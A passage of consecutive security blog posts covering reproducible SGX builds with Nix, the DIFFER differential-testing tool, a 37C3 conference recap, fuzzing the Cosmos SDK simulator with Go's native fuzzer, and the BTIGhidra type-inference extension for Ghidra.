The Nix part of the build is unfortunately incorrect and doesn't deliver much value. The dependencies are hand-picked from the prebuilt cache, which circumvents the build transparency Nix provides. The build runs in a nix-shell that should be used only for development purposes. The shell doesn't provide the same sandboxing features as the regular Nix build and allows different kinds of impurities. In fact, I discovered some impurities when porting the SDK build to Nixpkgs. Some of those issues were also noticed by another researcher but remain unaddressed.

Bringing SGX SDK to Nixpkgs

I concluded that the SGX SDK should belong to Nixpkgs to achieve truly reproducible and transparent enclave builds. It turned out there was already an ongoing effort, which I joined and helped finish. The work has been expanded and maintained by the community since then. Now, any SGX enclave can be easily built with Nix by using the sgx-sdk package. I hope that once this solution matures, Nixpkgs maintainers can maintain it together with Intel and bring it into the official SGX SDK repository.

We prepared the reproducible-sgx GitHub repository to show how to build Intel’s sample enclaves with Nix and the ported SDK. While this shows the basics, SGX enclaves can be almost arbitrarily complex and use different libraries and programming languages. If you wish to see another example, feel free to open an issue or a pull request.

In this blog post, we discussed only a slice of the possible security issues concerning SGX enclaves. For example, numerous side-channel attacks have been demonstrated against SGX, such as the recent attack on Blu-ray DRM. If you need help with the security of a system that uses SGX or Nix, don’t hesitate to contact us.

Introducing DIFFER, a new tool for testing and validating transformed programs

31 January 2024 at 14:30

By Michael Brown

We recently released a new differential testing tool, called DIFFER, for finding bugs and soundness violations in transformed programs. DIFFER combines elements from differential, regression, and fuzz testing to help users find bugs in programs that have been altered by software rewriting, debloating, and hardening tools. We used DIFFER to evaluate 10 software debloating tools, and it discovered debloating failures or soundness violations in 71% of the transformed programs produced by these tools.

DIFFER fills a critical need in post-transformation software validation. Program transformation tools usually leave this task entirely to users, who typically have few (if any) tools beyond regression testing via existing unit/integration tests and fuzzers. These approaches do not naturally support testing transformed programs against their original versions, which can allow subtle and novel bugs to find their way into the modified programs.

We’ll provide some background on the research that motivated us to create DIFFER, describe how it works in more detail, and discuss its future.

If you prefer to go straight to the code, check out DIFFER on GitHub.

Background

Software transformation has been a hot research area over the past decade and has primarily been motivated by the need to secure legacy software. In many cases, this must be done without the software’s source code (binary only) because it has been lost, is vendor-locked, or cannot be rebuilt due to an obsolete build chain. Among the more popular research topics that have emerged in this area are binary lifting, recompiling, rewriting, patching, hardening, and debloating.

While tools built to accomplish these goals have demonstrated some successes, they carry significant risks. When compilers lower source code to binaries, they discard contextual information once it is no longer needed. Once a program has been lowered to binary, the contextual information necessary to safely modify the original program generally cannot be fully recovered. As a result, tools that modify program binaries directly may inadvertently break them and introduce new bugs and vulnerabilities.

While DIFFER is application-agnostic, we originally built this tool to help us find bugs in programs that have had unnecessary features removed with a debloating tool (e.g., Carve, Trimmer, Razor). In general, software debloaters try to minimize a program’s attack surface by removing unnecessary code that may contain latent vulnerabilities or be reused by an attacker using code-reuse exploit patterns. Debloating tools typically perform an analysis pass over the program to map features to the code necessary to execute them. These mappings are then used to cut code that corresponds to features the user doesn’t want. However, these cuts will likely be imprecise because generating the mappings relies on imprecise analysis steps like binary recovery. As a result, new bugs and vulnerabilities can be introduced into debloated programs during cutting, which is exactly what we have designed DIFFER to detect.

How does DIFFER work?

At a high level, DIFFER (shown in figure 1) is used to test an unmodified version of the program against one or more modified variants of the program. DIFFER allows users to specify seed inputs that correspond to both unmodified and modified program behaviors and features. It then runs the original program and the transformed variants with these inputs and compares the outputs. Additionally, DIFFER supports template-based mutation fuzzing of these seed inputs. By providing mutation templates, DIFFER can maximize its coverage of the input space and avoid missing bugs (i.e., false negatives).

DIFFER expects to see the same outputs for the original and variant programs when given inputs that correspond to unmodified features. Conversely, it expects to see different outputs when it executes the programs with inputs corresponding to modified features. If DIFFER detects unexpected matching, differing, or crashing outputs, it reports them to the user. These reports help the user identify errors in the modified program resulting from the transformation process or its configuration.

Figure 1: Overview of DIFFER
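
The workflow in figure 1 can be reduced to a simple core: run the original program and a transformed variant on the same input and flag any divergence. The Go sketch below is our own illustration of that core loop, not DIFFER’s implementation (DIFFER itself does considerably more); the binary paths and the input are hypothetical:

// Sketch of the core differential check (not DIFFER's actual code):
// run the original program and a transformed variant on the same input
// and report any divergence in exit status or output.
package main

import (
    "bytes"
    "fmt"
    "os/exec"
)

// runOnce executes a binary with the given arguments and returns its
// combined output and exit code.
func runOnce(binary string, args ...string) ([]byte, int, error) {
    cmd := exec.Command(binary, args...)
    out, err := cmd.CombinedOutput()
    if err != nil {
        if exitErr, ok := err.(*exec.ExitError); ok {
            return out, exitErr.ExitCode(), nil
        }
        return out, -1, err
    }
    return out, 0, nil
}

func main() {
    // Hypothetical original and debloated binaries plus one seed input.
    input := "--help"
    origOut, origCode, err := runOnce("./original", input)
    if err != nil {
        panic(err)
    }
    varOut, varCode, err := runOnce("./variant", input)
    if err != nil {
        panic(err)
    }

    if origCode != varCode || !bytes.Equal(origOut, varOut) {
        fmt.Println("divergence detected: inspect the transformed variant")
    } else {
        fmt.Println("outputs match for this input")
    }
}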

When configuring DIFFER, the user selects one or more comparators to use when comparing outputs. While DIFFER provides many built-in comparators that check basic outputs such as return codes, console text, and output files, more advanced comparators are often needed. For this purpose, DIFFER allows users to add custom comparators for complex outputs like packet captures. Custom comparators are also useful for reducing false-positive reports by defining allowable differences in outputs (such as timestamps in console output). Our open-source release of DIFFER contains many useful comparator implementations to help users easily write their own comparators.
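
As a sketch of what such a comparator might do, the following Go function (our own illustration, not DIFFER’s comparator API) treats two console outputs as equivalent once timestamps have been normalized away:

// Sketch of a custom comparator concept (not DIFFER's API): treat console
// outputs as equivalent if they match after timestamps are normalized.
package comparators

import (
    "bytes"
    "regexp"
)

// timestampRe matches ISO-8601-style timestamps such as "2024-01-31T14:30:00".
var timestampRe = regexp.MustCompile(`\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}`)

// ConsoleEqualIgnoringTimestamps reports whether two console outputs are
// identical once timestamps are replaced with a fixed placeholder.
func ConsoleEqualIgnoringTimestamps(original, variant []byte) bool {
    normalize := func(b []byte) []byte {
        return timestampRe.ReplaceAll(b, []byte("<timestamp>"))
    }
    return bytes.Equal(normalize(original), normalize(variant))
}

Normalizing rather than stripping the timestamps keeps line alignment intact, which makes the reported diff easier to read when a real divergence is found.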

However, DIFFER does not and cannot provide formal guarantees of soundness in transformation tools or the modified programs they produce. Like other dynamic analysis testing approaches, DIFFER cannot exhaustively test the input space for complex programs in the general case.

Use case: evaluating software debloaters

In a recent research study we conducted in collaboration with our friends at GrammaTech, we used DIFFER to evaluate debloated programs created by 10 different software debloating tools. We used these tools to remove unnecessary features from 20 different programs of varying size, complexity, and purpose. Collectively, the tools created 90 debloated variant programs that we then validated with DIFFER. DIFFER discovered that 39 (~43%) of these variants still had features that debloating tools failed to remove. Even worse, DIFFER found that 25 (~28%) of the variants either crashed or produced incorrect outputs in retained features after debloating.

By discovering these failures, DIFFER has proven itself as a useful post-transformation validation tool. Although this study was focused on debloating transformations, we want to emphasize that DIFFER is general enough to test other transformation tools such as those used for software hardening (e.g., CFI, stack protections), translation (e.g., C-to-Rust transformers), and surrogacy (e.g., ML surrogate generators).

What’s next?

With DIFFER now available as open-source software, we invite the security research community to use, extend, and help maintain DIFFER via pull requests. We have several specific improvements planned as we continue to research and develop DIFFER, including the following:

  • Support running binaries in Docker containers to reduce environmental burdens.
  • Add new built-in comparators.
  • Add support for targets that require superuser privileges.
  • Support monitoring multiple processes that make up distributed systems.
  • Add runtime comparators (via instrumentation, etc.) for “deep” equivalence checks.

Acknowledgements

This material is based on work supported by the Office of Naval Research (ONR) under Contract No. N00014-21-C-1032. Any opinions, findings and conclusions, or recommendations expressed in this material are those of the author and do not necessarily reflect the views of the ONR.

Chaos Communication Congress (37C3) recap

2 February 2024 at 14:00

Last month, two of our engineers attended the 37th Chaos Communication Congress (37C3) in Hamburg, joining thousands of hackers who gather each year to exchange the latest research and achievements in technology and security. Unlike other tech conferences, this annual gathering focuses on the interaction of technology and society, covering such topics as politics, entertainment, art, sustainability—and, most importantly, security. At the first Congress in the 80s, hackers showcased weaknesses in banking applications over the German BTX system; this year’s theme, “Unlocked,” highlighted breaking technological barriers and exploring new frontiers in digital rights and privacy.

In this blog post, we will review our contributions to 37C3—spanning binary exploitation, binary analysis, and fuzzing—before highlighting several talks we attended and recommend listening to.

PWNing meetups

Trail of Bits engineer Dominik Czarnota self-organized two sessions about PWNing, also known as binary exploitation. These meetups showcased Pwndbg and Pwntools, popular tools used during CTF competitions, reverse engineering, and vulnerability research work.

At the first session, Dominik presented Pwndbg, a plugin for GDB that enhances the debugging of low-level code by displaying useful context on each program stop. This context includes the state of the debugged program (its registers, executable code, and stack memory) and dereferenced pointers, which help the user understand the program’s behavior. The presentation showed some of Pwndbg’s features and commands, such as listing memory mappings (vmmap), displaying process information (procinfo), searching memory (search), finding pointers to specific memory mappings (p2p), identifying stack canary values (canary), and controlling process execution (nextsyscall, stepuntilasm, etc.). The presentation concluded with the release of Pwndbg cheatsheets and details on upcoming features, such as tracking GOT function executions and glibc heap use-after-free analysis. These features have been developed as part of Trail of Bits’s winternship program, now in its thirteenth year of welcoming interns who work and do research on the industry’s most challenging problems.



At the second session, Arusekk and Peace-Maker showcased advanced features of Pwntools, a Swiss Army knife Python library for exploit development. They demonstrated expert methods for receiving and sending data (e.g., io.recvregex or io.recvpred); command-line tricks for running exploit scripts (cool environment variables or arguments like DEBUG, NOASLR, or LOG_FILE that set certain config options); and other neat features like the libcdb command-line tool, the shellcraft module, and the ROP (return-oriented programming) helper. For those who missed it, the slides can be found here.

Next generation fuzzing

In Fuzz Everything, Everywhere, All at Once, the AFL++ and LibAFL team showcased new features in the LibAFL fuzzer. They presented QEMU-based instrumentation to fuzz binary-only targets and used QEMU hooks to enable sanitizers that help find bugs. In addition to QASan—their QEMU-based AddressSanitizer implementation—the team developed an injection sanitizer that goes beyond finding just memory corruption bugs. Using QEMU hooks, SQL, LDAP, XSS, or OS command injections can be detected by defining rules in a TOML configuration file. Examination of the config file suggests it should be easily extensible to other injections; we just need to know which functions to hook and which payloads to look for.

Although memory corruption bugs will decline with the deployment of memory-safe languages like Rust, fuzzing will continue to play an important role in uncovering other bug classes like injections or logic bugs, so it’s great to see new tools created to detect them.

This presentation’s Q&A session reminded us that oss-fuzz already has a SystemSanitizer that leverages the ptrace syscall, which helped to find a command injection vulnerability in the past.

In the past, Trail of Bits has used LibAFL in our collaboration with Inria on an academic research project called tlspuffin. The goal of the project was to fuzz various TLS implementations, which uncovered several bugs in wolfSSL.

Side channels everywhere

In a talk titled Full AACSess: Exposing and exploiting AACSv2 UHD DRM for your viewing pleasure, Adam Batori presented a concept for side-channel attacks on Intel SGX. Since Trail of Bits frequently conducts audits on projects that use trusted execution environments like Intel SGX (e.g., Mobilecoin), this presentation was particularly intriguing to us.

After providing an overview of the history of DRM for physical media, Adam went into detail on how the team of researchers behind sgx.fail extracted cryptographic key material from the SGX enclave to break DRM on UHD Blu-ray disks, proving the feasibility of real-world side-channel attacks on secure enclaves. Along the way, he discussed many technological features of SGX.

The work and talk prompted discussion about Intel’s decision to discontinue SGX on consumer hardware. Due to the high risk of side channels on low-cost consumer devices, we believe that using Intel SGX for DRM purposes is already dead on arrival. Side-channel attacks are just one example of the often-overlooked challenges that accompany the secure use of enclaves to protect data.

New challenges: Reverse-engineering Rust

Trail of Bits engineers frequently audit software written in Rust. In Rust Binary Analysis, Feature by Feature, Ben Herzog discussed the compilation output of the Rust compiler. Understanding how Rust builds binaries is important, for example, to optimize Rust programs or to understand the interaction between safe and unsafe Rust code. The talk focused on the debug compilation mode to showcase how the Rust compiler generates code for iterating over ranges and using iterators, and how it optimizes the layout of Rust enums. The presenter also noted that strings in Rust are not null-terminated, which can cause some reverse-engineering tools like Ghidra to produce hard-to-understand output.

The speaker posed four questions that should be answered when encountering function calls related to traits:

  • What is the name of the function being called (e.g., next)?
  • On what type is the function defined (e.g., Values<String, Person>)?
  • Which type is returned from the function (e.g., Option)?
  • What trait is the function part of (e.g., Iterator<Type=Person>)?

More details can be found in the blog post by Ben Herzog.

Proprietary cryptography is considered harmful

Under the name TETRA:BURST, researchers disclosed multiple vulnerabilities in the TETRA radio protocol, which is used by government agencies, police, military, and critical infrastructure across Europe and beyond. It is striking that proprietary cryptography is still the default in some industries: hiding the specification from security researchers by requiring them to sign an NDA greatly limits a system’s reviewability.

Due to export controls, several classes of algorithms exist in TETRA. One of the older ones, TEA1, uses a key length of only 32 bits, a key space of roughly 4.3 billion keys that commodity hardware can search exhaustively in a practical amount of time. Even though the specifiers no longer recommend TEA1, it is still actively deployed in the field, which is especially problematic given that these weak algorithms are relied upon to protect critical infrastructure.

The researchers demonstrated the exploitability of the vulnerabilities by acquiring radio hardware from online resellers.

Are you sure you own your train? Do you own your car?

In Breaking “DRM” in Polish trains, researchers reported the challenges they encountered after they were recruited by an independent train repair company to determine why some trains no longer operated after being serviced.
Using reverse engineering, the researchers uncovered several anti-features in the trains that made them stop working in various situations (e.g., after they hadn’t moved for a certain time or when they were located at the GPS coordinates of competitors’ service shops). The talk covers interesting technical details about train software and how the researchers reverse-engineered the firmware, and it questions the extent to which users should have control over the vehicles and devices they own.

What can we learn from hackers as developers and auditors?

Hackers possess a unique problem-solving mindset, showing developers and auditors the importance of creative and unconventional thinking in cybersecurity. The event highlighted the necessity of securing systems correctly, starting from a well-understood threat model. Incorrect or proprietary approaches that rely on obfuscation do not adequately protect the end products: controls such as hiding cryptographic primitives behind an NDA only obscure how a protocol works; they do not make the system more secure, and they make security researchers’ jobs harder.

Emphasizing continuous learning, the congress demonstrated the ever-evolving nature of cybersecurity, urging professionals to stay abreast of the latest threats and technologies. Ethical considerations were a focal point, stressing the responsibility of developers and auditors to respect user privacy and data security in their work.

The collaborative spirit of the hacker community, as seen at 37C3, serves as a model for open communication and mutual learning within the tech industry. At Trail of Bits, we are committed to demonstrating these values by sharing knowledge publicly through publishing blog posts like this one, resources like the Testing Handbook that help developers secure their code, and documentation about our research into zero-knowledge proofs.

Closing words

We highly recommend attending the Congress in person, even though the date falls awkwardly between Christmas and New Year’s and most talks are live-streamed and available online. The congress includes many self-organized sessions, workshops, and assemblies, making it especially valuable for security researchers. We had initially planned to disclose our recently published LeftoverLocals bug, a vulnerability that affects notable GPU vendors like AMD, Qualcomm, and Apple, at 37C3, but we held off our release to give GPU vendors more time to fix the bug. The disclosure was finally published on January 16; we may report our experience finding and disclosing the bug at next year’s 38C3!

Improving the state of Cosmos fuzzing

5 February 2024 at 14:00

By Gustavo Grieco

Cosmos is a platform enabling the creation of blockchains in Go (or other languages). Its reference implementation, Cosmos SDK, leverages fuzz testing extensively, following two approaches: smart fuzzing for low-level code and dumb fuzzing for high-level simulation.

In this blog post, we explain the differences between these approaches and show how we added smart fuzzing on top of the high-level simulation framework. As a bonus, our smart fuzzer integration led us to identify and fix three minor issues in Cosmos SDK.

Laying low

The first approach to Cosmos code fuzzing leverages well-known smart fuzzers such as AFL, go-fuzz, or Go native fuzzing for specific parts of the code. These tools rely on source code instrumentation to extract useful information to guide a fuzzing campaign. This is essential to explore the input space of a program efficiently.

Using fuzzing for low-level testing of Go functions in Cosmos SDK is very straightforward. First, we select a suitable target function, usually stateless code, such as the parsing of normalized coins:

func FuzzTypesParseCoin(f *testing.F) {
    f.Fuzz(func(t *testing.T, data []byte) {
        _, _ = types.ParseCoinNormalized(string(data))
    })
}

Figure 1: A small fuzz test for testing the parsing of normalized coins

Smart fuzzers can quickly find issues in stateless code like this; however, when applied only to low-level code, they will not uncover the more complex and interesting issues that arise during cosmos-sdk execution.

Moving up!

If we want to catch more interesting bugs, we need to go beyond low-level fuzz testing in Cosmos SDK. Fortunately, there is already a high-level approach to testing that works from the top down instead of the bottom up: cosmos-sdk provides the Cosmos Blockchain Simulator, a high-level, end-to-end transaction fuzzer, for uncovering issues in Cosmos applications.

This tool allows executing random operation transactions, starting either from a random genesis state or a predefined one. To get this tool to work, application developers must implement several important functions that will generate both a random genesis state and transactions. Fortunately for us, this is fully implemented for all the cosmos-sdk features.

For instance, to test the MsgSend operation from the x/nft module, the developers defined the SimulateMsgSend function to generate a random NFT transfer:

// SimulateMsgSend generates a MsgSend with random values.
func SimulateMsgSend(
        cdc *codec.ProtoCodec,
        ak nft.AccountKeeper,
        bk nft.BankKeeper,
        k keeper.Keeper,
) simtypes.Operation {
        return func(
                r *rand.Rand, app *baseapp.BaseApp, ctx sdk.Context, accs []simtypes.Account, chainID string,
        ) (simtypes.OperationMsg, []simtypes.FutureOperation, error) {
                sender, _ := simtypes.RandomAcc(r, accs)
                receiver, _ := simtypes.RandomAcc(r, accs)
                …

Figure 2: Header of the SimulateMsgSend function from the x/nft module

While the simulator can produce end-to-end executions of transaction sequences, there is an important difference from smart fuzzers such as go-fuzz. When the simulator is invoked, it uses only a single source of randomness to produce values. This source is configured when the simulation starts:

func SimulateFromSeed(
        tb testing.TB,
        w io.Writer,
        app *baseapp.BaseApp,
        appStateFn simulation.AppStateFn,
        randAccFn simulation.RandomAccountFn,
        ops WeightedOperations,
        blockedAddrs map[string]bool,
        config simulation.Config,
        cdc codec.JSONCodec,
) (stopEarly bool, exportedParams Params, err error) {
        // in case we have to end early, don't os.Exit so that we can run cleanup code.
        testingMode, _, b := getTestingMode(tb)

        fmt.Fprintf(w, "Starting SimulateFromSeed with randomness created with seed %d\n", int(config.Seed))
        r := rand.New(rand.NewSource(config.Seed))
        params := RandomParams(r)
        …

Figure 3: Header of the SimulateFromSeed function

Since the simulation mode will only loop through a number of purely random transactions, it is pure random testing (also called dumb fuzzing).

Why don’t we have both?

It turns out, there is a simple way to combine these approaches, allowing the native Go fuzzing engine to randomly explore the cosmos-sdk genesis, the generation of transactions, and the block creation. The first step is to create a fuzz test that invokes the simulator. We based this code on the unit tests in the same file:

func FuzzFullAppSimulation(f *testing.F) {
    f.Fuzz(func(t *testing.T, input [] byte) {
       …
       config.ChainID = SimAppChainID

       appOptions := make(simtestutil.AppOptionsMap, 0)
       appOptions[flags.FlagHome] = DefaultNodeHome
       appOptions[server.FlagInvCheckPeriod] = simcli.FlagPeriodValue
        db := dbm.NewMemDB()
       logger := log.NewNopLogger()

       app := NewSimApp(logger, db, nil, true, appOptions, interBlockCacheOpt(), baseapp.SetChainID(SimAppChainID))
       require.Equal(t, "SimApp", app.Name())

       // run randomized simulation
       _,_, err := simulation.SimulateFromSeed(
               t,
               os.Stdout,
               app.BaseApp,
               simtestutil.AppStateFn(app.AppCodec(), app.SimulationManager(), app.DefaultGenesis()),
               simtypes.RandomAccounts,
               simtestutil.SimulationOperations(app, app.AppCodec(), config),
               BlockedAddresses(),
               config,
               app.AppCodec(),
       )

       if err != nil {
               panic(err)
       }
    })
}

Figure 4: Template of a Go fuzz test running a full simulation of cosmos-sdk

We still need a way to let the fuzzer control possible inputs. A simple approach would be to let the smart fuzzer directly control the seed of the random value generator:

func FuzzFullAppSimulation(f *testing.F) {
    f.Fuzz(func(t *testing.T, input [] byte) {
       config.Seed = IntFromBytes(input)
       …

Figure 5: A fuzz test that receives a single seed as input

func SimulateFromSeed(
        …
        config simulation.Config,
        … 
) (stopEarly bool, exportedParams Params, err error) {
        …
        r := rand.New(rand.NewSource(config.Seed))
        …

Figure 6: Lines modified in SimulateFromSeed to load a seed from the fuzz test

However, there is an important flaw in this approach: changing the seed directly gives the fuzzer very limited control over the input, so its smart mutations will be largely ineffective. Instead, we need to allow the fuzzer to control the output of the random number generator more directly, but without refactoring every simulated function in every module. 😱

Against all odds

The Go standard library already ships with a variety of general-purpose functions and data structures. In that sense, Go has “batteries included.” In particular, it provides a random number generator in the math/rand package:

// A Rand is a source of random numbers.
type Rand struct {
    src Source
    s64 Source64 // non-nil if src is source64

    // readVal contains remainder of 63-bit integer used for bytes
    // generation during most recent Read call.
    // It is saved so next Read call can start where the previous
    // one finished.
    readVal int64
    // readPos indicates the number of low-order bytes of readVal
    // that are still valid.
    readPos int8
}

… 
// Seed uses the provided seed value to initialize the generator to a deterministic state.
// Seed should not be called concurrently with any other Rand method.
func (r *Rand) Seed(seed int64) {
    if lk, ok := r.src.(*lockedSource); ok {
        lk.seedPos(seed, &r.readPos)
        return
    }

    r.src.Seed(seed)
    r.readPos = 0
}

// Int63 returns a non-negative pseudo-random 63-bit integer as an int64.
func (r *Rand) Int63() int64 { return r.src.Int63() }

// Uint32 returns a pseudo-random 32-bit value as a uint32.
func (r *Rand) Uint32() uint32 { return uint32(r.Int63() >> 31) }
…

Figure 7: Rand data struct and some of its implementation code

However, we can’t easily provide an alternative implementation of this because Rand was declared as a type and not as an interface. But we can still provide our custom implementation of its randomness source (Source/Source64):

// A Source64 is a Source that can also generate
// uniformly-distributed pseudo-random uint64 values in
// the range [0, 1<<64) directly.
// If a Rand r's underlying Source s implements Source64,
// then r.Uint64 returns the result of one call to s.Uint64
// instead of making two calls to s.Int63.
type Source64 interface {
    Source
    Uint64() uint64
}

Figure 8: Source64 data type

Let’s replace the default Source with a new one that uses the input from the fuzzer (e.g., an array of int64) as a deterministic source of randomness (arraySource):

type arraySource struct {
    pos int
    arr []int64
    src *rand.Rand
}

// Uint64 returns a non-negative pseudo-random 64-bit integer as a uint64.
// It replays values from the fuzzer-provided array and falls back to the
// wrapped random source once the array is exhausted.
func (rng *arraySource) Uint64() uint64 {
    if rng.pos >= len(rng.arr) {
        return rng.src.Uint64()
    }
    val := rng.arr[rng.pos]
    rng.pos = rng.pos + 1
    if val < 0 {
        // Negative values are mapped to their magnitude so the result is non-negative.
        return uint64(-val)
    }
    return uint64(val)
}

Figure 9: An implementation of Uint64() that produces unsigned integers from our deterministic source of randomness

This new type of source either pops a number from the array or produces a random value from a standard random source if the array was fully consumed. This allows the fuzzer to continue even if all the deterministic values were consumed.
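
For completeness, here is a minimal sketch of how such a source can be plugged into math/rand. It is our own illustration rather than the exact code from our patch: arraySource additionally needs Int63 and Seed methods to satisfy the rand.Source interface, and newFuzzRand (a hypothetical helper name) decodes the raw fuzz input into the int64 array that the source replays. It requires the encoding/binary and math/rand imports.

// Minimal sketch (not the exact patch): make arraySource satisfy
// math/rand's Source interface and build a *rand.Rand from the fuzz input.

// Int63 derives a non-negative 63-bit value from Uint64 so that
// arraySource can be used as a rand.Source.
func (rng *arraySource) Int63() int64 { return int64(rng.Uint64() >> 1) }

// Seed is a no-op: determinism comes from the fuzzer-provided array,
// not from a seed value.
func (rng *arraySource) Seed(seed int64) {}

// newFuzzRand decodes the raw fuzz input into int64 values and wraps
// them in a rand.Rand for the simulator to consume.
func newFuzzRand(input []byte) *rand.Rand {
    vals := make([]int64, 0, len(input)/8)
    for len(input) >= 8 {
        vals = append(vals, int64(binary.LittleEndian.Uint64(input[:8])))
        input = input[8:]
    }
    return rand.New(&arraySource{
        arr: vals,
        src: rand.New(rand.NewSource(0)), // fallback once the array is exhausted
    })
}

This mirrors the replacement described above: instead of rand.New(rand.NewSource(config.Seed)), the simulator draws values that ultimately come from the fuzz input.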

Ready, Set, Go!

Once we have modified the code to properly control the random source, we can leverage Go fuzzing like this:

$ go test -mod=readonly -run=_ -fuzz=FuzzFullAppSimulation -GenesisTime=1688995849 -Enabled=true -NumBlocks=2 -BlockSize=5 -Commit=true -Seed=0 -Period=1 -Verbose=1 -parallel=15
fuzz: elapsed: 0s, gathering baseline coverage: 0/1 completed
fuzz: elapsed: 1s, gathering baseline coverage: 1/1 completed, now fuzzing with 15 workers
fuzz: elapsed: 3s, execs: 16 (5/sec), new interesting: 0 (total: 1)
fuzz: elapsed: 6s, execs: 22 (2/sec), new interesting: 0 (total: 1)
…
fuzz: elapsed: 54s, execs: 23 (0/sec), new interesting: 0 (total: 1)
fuzz: elapsed: 57s, execs: 23 (0/sec), new interesting: 0 (total: 1)
fuzz: elapsed: 1m0s, execs: 23 (0/sec), new interesting: 0 (total: 1)
fuzz: elapsed: 1m3s, execs: 23 (0/sec), new interesting: 5 (total: 6)
fuzz: elapsed: 1m6s, execs: 30 (2/sec), new interesting: 10 (total: 11)
fuzz: elapsed: 1m9s, execs: 38 (3/sec), new interesting: 11 (total: 12)

Figure 10: A short fuzzing campaign using the new approach

After running this code for a few hours, we had collected a small trophy case of low-severity bugs: the three minor issues in Cosmos SDK mentioned at the start of this post.

We provided the Cosmos SDK team with our patch for improving the simulation tests, and we are discussing with them how to best integrate it into the master branch.

Binary type inference in Ghidra

7 February 2024 at 14:00

By Ian Smith

Trail of Bits is releasing BTIGhidra, a Ghidra extension that helps reverse engineers by inferring type information from binaries. The analysis is inter-procedural, propagating and resolving type constraints between functions while consuming user input to recover additional type information. This refined type information produces more idiomatic decompilation, enhancing reverse engineering comprehension. The figures below demonstrate how BTIGhidra improves decompilation readability without any user interaction:

Figure 1: Default Ghidra decompiler output

Figure 2: Ghidra output after running BTIGhidra

Precise typing information transforms odd pointer arithmetic into field accesses and void* into the appropriate structure type; introduces array indexing where appropriate; and reduces the clutter of void* casts and dereferences. While type information is essential to high-quality decompilation, the recovery of precise type information unfortunately presents a major challenge for decompilers and reverse engineers. Information about a variable’s type is spread throughout the program wherever the variable is used. For reverse engineers, it is difficult to keep a variable’s dispersed usages in their heads while reasoning about a local type. We created BTIGhidra in an effort to make this challenge a thing of the past.

A simple example

Let’s see how BTIGhidra can improve decompiler output for an example binary taken from a CTF challenge called mooosl (figure 3). (Note: Our GitHub repository has directions for using the plugin to reproduce this demo.) The target function, called lookup, iterates over nodes in a linked list until it finds a node with a matching key in a hashmap stored in list_heads.1 This function hashes the queried key, then selects the linked list that stores all nodes that have a key equal to that hash. Next, it traverses the linked list looking for a key that is equal to the key parameter.

Figure 3: Linked-list lookup function from mooosl

The structure for linked list nodes (figure 4) is particularly relevant to this example. The structure has buffers for the key and value stored in the node, along with sizes for each buffer. Additionally, each node has a next pointer that is either null or points to the next node in the linked list.

Figure 4: Linked list node structure definition

Figure 5 shows Ghidra’s initial decompiler output for the lookup function (FUN_001014fb). The overall decompilation quality is low due to poor type information across the function. For example, the recursive pointer next in the source code causes Ghidra to emit a void** type for the local variable (local_18), and the return type. Also, the type of the key_size function parameter, referred to as param_2 in the output, is treated as a void* type despite not being loaded from. Finally, the access to the global variable that holds linked list head nodes, referred to as DAT_00104010, is not treated as an array indexing operation.

Figure 5: Ghidra decompiler output for the lookup function without type inference.
Highlighted red text is changed after running type inference.

Figure 6 shows a diff against the code in figure 5 after running BTIGhidra. Notice that the output now captures the node structure and the recursive type for the next pointer, typed as struct_for_node_0_9* instead of void**. BTIGhidra also resolves the return type to the same type. Additionally, the key_size parameter (param_2) is no longer treated as a pointer. Finally, the type of the global variable is updated to a pointer to linked list node pointers (PTR_00104040), causing Ghidra to treat the load as an array indexing operation.

Figure 6: Ghidra decompiler output for the lookup function with type inference.
Highlighted green text was added by type inference.

BTIGhidra infers types by collecting a set of subtyping constraints and then solving those constraints. Usages of known function signatures act as sources for type constraints. For instance, the call to memcmp in figure 5 results in a constraint declaring that param_2 must be a subtype of size_t. Notice in the figure that BTIGhidra successfully identifies the four fields used in this function, while also recovering the additional fields used elsewhere in the binary.

Additionally, users can supply a known function signature to provide additional type information for the type inference algorithm to propagate across the decompiled program. Figure 7 demonstrates how new type information from a known function signature (value_dump in this case) flows from a call site back to the return type of the lookup function (referred to as FUN_001014fb in the decompiled output) in figure 5. The red line depicts how the user-defined function signature for value_dump is used to infer the types of field_at_8 and field_at_24 for the returned struct_for_node_0_9 from the original function FUN_001014fb. The type information derived from this call is combined with all other call sites to FUN_001014fb in order to remain conservative in the presence of polymorphism.

Figure 7: Back-propagation of type information derived from value_dump function signature

Ultimately, BTIGhidra fills in the type information for the recovered structure’s used fields, shown in figure 8. Here, we see that the types for field_at_8 and field_at_24 are inferred via the invocation of value_dump. However, the fields with type undefined8 indicate that the field was not sufficiently constrained by the added function signature to derive an atomic type for the field (i.e., there are no usages that relate the field to known type information); the inference algorithm has determined only that the field must be eight bytes.

Figure 8: Struct type information table for decompiled linked list nodes

Ghidra’s decompiler does perform some type propagation using known function signatures provided by its predefined type databases, which cover common libraries such as libc. When decompiling a binary’s functions that call known library functions, these type signatures are used to guess likely types for the variables and parameters of the calling function. This approach has several limitations. Ghidra does not attempt to synthesize composite types (i.e., structs and unions) without user intervention; it is up to the user to define when and where structs are created. Additionally, this best-effort type propagation has limited inter-procedural power. As shown in figure 9, Ghidra’s default type inference results in conflicting types for FUN_001014fb and FUN_001013db (void* versus long and ulong), even though parameters are passed directly between the two functions.

Figure 9: Default decompiler output using Ghidra’s basic type inference

Our primary motivation for developing BTIGhidra is the need for a type inference algorithm in Ghidra that can propagate user-provided type information inter-procedurally. For such an algorithm to be useful, it should not guess a “wrong” type. If the user submits precise and correct type information, then the type inference algorithm should not derive conflicting type information that prevents user-provided types from being used. For instance, if the user provides a correct type float and we infer a type int, then these types will conflict, resulting in a type error (represented formally by a bottom lattice value). Therefore, inferred types must be conservative; the algorithm should not derive a type for a program variable that conflicts with its source-level type. In a type system with subtyping, this property can be phrased more precisely as “an inferred type for a program variable should always be a supertype of the actual type of the program variable.”

In addition to support for user-provided types, BTIGhidra overcomes many other shortcomings of Ghidra’s built-in type inference algorithm. Namely, BTIGhidra can operate over stripped binaries, synthesize composite types, ingest user-provided type constraints, derive conservative typing judgments, and collect a well-defined global view of a binary’s types.

Bringing type-inference to binaries

At the source level, type inference algorithms work by collecting type constraints on program terms that are expressed in the program text, which are then solved to produce a type for each term. BTIGhidra operates on similar principles, but needs to compensate for information loss introduced by compilation and C’s permissive types. BTIGhidra uses an expressive type system that supports subtyping, polymorphism, and recursive types to reason about common programming idioms in C that take advantage of the language’s weak types to emulate these type system features. Also, subtyping, when combined with reaching definitions analysis, allows the type inference algorithm to handle compiler-introduced behavior, such as register and stack variable reuse.

